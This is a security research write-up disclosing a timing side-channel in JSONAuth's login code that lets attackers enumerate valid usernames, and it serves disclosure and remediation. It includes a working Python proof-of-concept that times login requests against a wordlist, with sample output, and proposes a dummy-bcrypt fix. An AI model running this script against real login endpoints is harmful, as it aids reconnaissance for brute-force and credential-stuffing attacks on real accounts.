The Clock Doesn't Lie: Timing Attacks in Authentication Flows

CATEGORY: RESEARCH DATE: 2026-03-21

Research by badjuju - Red Orca

A timing side-channel in JSONAuth allows unauthenticated attackers to enumerate valid usernames based on response time differences.

Beyond the Status Code

When you’re poking at a login endpoint, the first thing you usually look at is the response: did I get a 200, a 401, or maybe a lucky 500 error?

But sometimes the most interesting part of the response isn’t the body or the status code—it’s the timing.

While reviewing a CVE in a similar project, I started wondering if those same patterns existed here. I decided to dive into auth/json.go to see if this project was susceptible to the same kind of timing side-channel. It didn’t take long to find exactly what I was looking for: a flaw that basically lets you enumerate users with nothing more than a stopwatch.


The Flaw: Efficiency as a Weakness

The issue is a “fail-fast” pattern in the authentication logic. The code looks up the user in the database before it even touches the password validation:

user, err := userStore.Get(username)
if err != nil {
    // The "Fast Path"
    return nil, fmt.Errorf("unable to get user from store: %v", err)
}

// The "Slow Path"
err = users.CheckPwd(password, user.Password)
if err != nil {
    return nil, err
}

From a performance standpoint, this makes total sense. Why burn CPU time checking a password if the username doesn’t even exist?

But there’s a catch: bcrypt is slow by design. Its configurable work factor makes each password check computationally expensive, which helps slow down brute-force attempts. By putting that check after the database lookup, the developers accidentally created two very different speeds for the login process:

That 40ms gap might not seem like much, but once you automate it, it becomes really obvious.


Proving the Point (PoC)

To see if this was actually exploitable over a network, I put together a quick script. The goal was to establish a “baseline” for a fake user and then see if real usernames stood out.

import requests
import time
import statistics

TARGET_URL = "http://localhost/api/auth/login"
WORDLIST = ["admin", "root", "user2", "nonexistent_test_user"]

def measure(username):
    start = time.perf_counter()
    requests.post(
        TARGET_URL, 
        params={"username": username}, 
        headers={"X-Password": "wrong-password"}
    )
    return time.perf_counter() - start

# 1. Calibration
print("[*] Calibrating...")
baselines = [measure(f"not_a_user_{i}") for i in range(20)]
threshold = statistics.mean(baselines) + (statistics.stdev(baselines) * 5)
print(f"[*] Baseline: {statistics.mean(baselines):.4f}s | Threshold: {threshold:.4f}s")

# 2. Testing the list
for user in WORDLIST:
    t = measure(user)
    status = "VALID" if t > threshold else "invalid"
    print(f"{user:<20} | {t:.4f}s | {status}")

Even with typical network jitter, the results were consistent:

[*] Calibrating...
[*] Baseline: 0.0041s | Threshold: 0.0256s
admin                | 0.0505s | VALID
root                 | 0.0019s | invalid
user2                | 0.0464s | VALID
nonexistent_test_user| 0.0015s | invalid

The Real-World Impact

Is this a “break-glass” emergency? Not exactly—it doesn’t let an attacker bypass the password. However, it’s a huge gift for reconnaissance.

If an attacker knows exactly which usernames are valid, they don’t have to spray thousands of guesses into the void. They can focus their efforts on real accounts, making their brute-force or credential-stuffing attacks way more efficient and much harder to spot in the logs.


The Fix: Constant Time

The fix here is basically to make the app lie about how much work it’s doing. We want every request to take roughly the same amount of time, whether the user exists or not.

One way to handle this is to run a “dummy” bcrypt check when a user isn’t found:

// Even if the user is missing, run a check against a static dummy hash
dummyHash := "$2a$12$examplehash..." 
bcrypt.CompareHashAndPassword([]byte(dummyHash), []byte(password))

This forces the “slow path” every time, which removes the timing difference and closes off the side-channel.

References & Discovery Timeline

This vulnerability was discovered during independent research and was coordinated with the maintainers via GitHub’s private security reporting feature.


Final Thoughts

This was a good reminder that “clean” or “efficient” code isn’t always secure code. In this case, trying to save a few milliseconds of CPU time actually created a privacy leak. When you’re building auth flows, sometimes you have to be a little inefficient to stay safe.


About

badjuju focuses on application security and vulnerability research, digging into how bugs happen and where things break in real systems.